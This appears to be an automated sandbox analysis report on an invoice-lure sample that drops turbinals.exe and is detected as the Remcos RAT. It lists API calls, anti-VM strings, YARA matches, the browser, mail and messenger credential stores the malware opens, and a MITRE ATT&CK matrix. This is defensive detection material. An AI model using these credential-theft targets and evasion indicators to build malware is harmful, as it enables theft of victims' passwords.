                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00ED49A0
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: wscript.exe, 00000008.00000002.1428817213.000001C21D2F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: bhv7BD7.tmp.5.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
                    Source: bhv7BD7.tmp.5.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeAPI call chain: ExitProcess graph end nodegraph_0-104255
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeAPI call chain: ExitProcess graph end nodegraph_0-104100
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeAPI call chain: ExitProcess graph end nodegraph_0-104321
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F43F09 BlockInput,0_2_00F43F09
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00ED3B3A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F05A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00F05A7C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_01027A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_01027A50
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_01170358 mov eax, dword ptr fs:[00000030h]0_2_01170358
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_011703B8 mov eax, dword ptr fs:[00000030h]0_2_011703B8
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_0116ECB6 mov eax, dword ptr fs:[00000030h]0_2_0116ECB6
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_0116ECC8 mov eax, dword ptr fs:[00000030h]0_2_0116ECC8
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00FF32C8 mov eax, dword ptr fs:[00000030h]2_2_00FF32C8
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00FF3328 mov eax, dword ptr fs:[00000030h]2_2_00FF3328
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00FF1C38 mov eax, dword ptr fs:[00000030h]2_2_00FF1C38
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00FF1C26 mov eax, dword ptr fs:[00000030h]2_2_00FF1C26
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F280A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,0_2_00F280A9
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EFA155
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFA124 SetUnhandledExceptionFilter,0_2_00EFA124
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D0A155
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0A124 SetUnhandledExceptionFilter,2_2_00D0A124

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: NULL target: C:\Users\user\AppData\Local\acceptancy\turbinals.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: NULL target: C:\Users\user\AppData\Local\acceptancy\turbinals.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: NULL target: C:\Users\user\AppData\Local\acceptancy\turbinals.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F287B1 LogonUserW,0_2_00F287B1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00ED3B3A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ED48D7
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F34C7F mouse_event,0_2_00F34C7F
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F27CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F27CAF
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F2874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F2874B
                    Source: z49FACTURA-0987678.exe, 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp, turbinals.exe, 00000002.00000002.1311968489.0000000000D94000.00000040.00000001.01000000.00000004.sdmp, turbinals.exe, 00000003.00000002.3756168869.0000000000D94000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: z49FACTURA-0987678.exe, turbinals.exeBinary or memory string: Shell_TrayWnd
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\38i
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk|
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758537352.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.drBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF862B cpuid 0_2_00EF862B
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F04E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F04E87
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F11E06 GetUserNameW,0_2_00F11E06
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F03F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F03F3A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00ED49A0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: turbinals.exe, 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1312007585.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1311883235.000000000155C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1428885907.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437261623.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1429031274.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447997256.0000000001233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7940, type: MEMORYSTR
                    Source: turbinals.exeBinary or memory string: WIN_81
                    Source: turbinals.exeBinary or memory string: WIN_XP
                    Source: turbinals.exeBinary or memory string: WIN_XPe
                    Source: turbinals.exeBinary or memory string: WIN_VISTA
                    Source: turbinals.exeBinary or memory string: WIN_7
                    Source: turbinals.exeBinary or memory string: WIN_8
                    Source: turbinals.exe, 0000000D.00000002.1464688620.0000000000D94000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905Jump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F46283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F46283
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F46747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F46747
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F07AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,0_2_00F07AA1
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00D56283
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00D56747
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D17AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,2_2_00D17AA1

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		2
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    Software Packing                    		1
                    Credentials In Files                    		28
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets241
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		Cached Domain Credentials1
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync4
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
